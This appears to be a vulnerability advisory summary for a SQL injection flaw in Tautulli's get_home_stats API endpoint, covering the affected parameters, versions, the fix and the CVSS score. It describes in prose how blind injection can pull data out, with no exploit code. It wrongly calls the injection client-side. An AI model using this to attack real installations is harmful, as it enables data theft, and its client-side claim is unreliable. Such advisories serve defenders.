The vulnerability allows authenticated attackers holding the Tautulli admin API key to inject arbitrary SQL into the /api/v2?cmd=get_home_stats endpoint. The backend concatenates the "before", "after", "section_id", and "user_id" query parameters into a SQL statement using Python string formatting without parameterization. This permits boolean‑blind inference to read values from the SQLite database, enabling exfiltration of any data stored by Tautulli. The weakness is a classic SQL injection scenario (CWE‑89) arising from unsafe input handling (CWE‑20).

Affected systems are instances of the Tautulli monitoring and tracking tool for Plex Media Server. Any installation running Tautulli version 2.14.2 through 2.16.x (inclusive) suffers from the injection via the "before" and "after" parameters, while versions 2.1.0‑beta to 2.16.x also contain the issue for the "section_id" and "user_id" parameters. The problem exists in all builds before the 2.17.0 release, which includes the patched version 2.17.0. Tautulli is a Python application hosted on various operating systems; the vulnerability is present wherever the vulnerable API endpoint is enabled.

With a CVSS score of 4.9, the vulnerability is considered moderate. The EPSS score is not available, so the likelihood of automated exploitation is unclear, but the attacker simply needs to possess a valid admin API key to construct the malicious request. Because the endpoint is exposed over the network and the injection occurs client‑side, if an attacker can guess or compromise the key, the data exfiltration can be performed without additional privileges. The issue is not yet listed in the CISA KEV catalog, indicating no known public exploitation instances. Nevertheless, the potential impact on confidentiality justifies prompt remediation.